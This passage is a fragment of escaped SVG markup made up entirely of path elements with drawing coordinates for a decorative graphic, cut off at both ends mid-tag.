d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n        <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n        <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n        <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n        <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n        <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n        <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n        <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n        <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n        <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n        <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n        <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n        <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n        <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n        <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n        <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n        <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n        <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n        <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n        <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n        <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n        <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n        <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n        <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n        <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n        <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n        <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n        <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n        <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n        <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n        <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n        <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n        <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n        <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n        <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n        <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n        <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n        <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n        <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n        <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n        <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n        <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n        <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n        <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n        <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n        <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n        <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n        <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n        <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n        <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n        <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n        <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n        <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n        <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n        <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n        <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n        <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n        <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n        <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n        <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n        <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n        <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n        <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n        <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n        <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n        <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n        <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n        <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n        <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n        <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n        <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n        <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n        <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n        <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n        <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n        <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n        <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n        <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n        <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n        <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n        <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n        <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n        <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n        <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n        <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n        <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n        <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n        <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n        <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n        <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n        <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n        <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n        <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n        <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n        <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n        <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n        <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n        <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n        <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n        <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n        <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n        <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n        <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n        <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n        <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n        <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n        <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n        <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n        <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n        <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n        <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n        <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n        <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n        <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n        <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n        <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n        <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n        <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n        <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n        <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n        <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n        <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n        <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n        <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n        <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n        <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n        <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n        <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n        <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n        <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n        <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n        <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n        <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n        <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n        <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n        <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n        <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n        <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n        <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n        <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n        <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n        <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n        <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n        <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n        <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n        <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n        <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n        <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n        <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n        <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n        <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n        <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n        <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n        <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n        <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n        <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n        <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n        <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n        <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n        <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n        <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n        <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n        <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n        <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n        <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n        <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n        <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n        <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n        <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n        <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n        <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n        <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n        <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n        <path 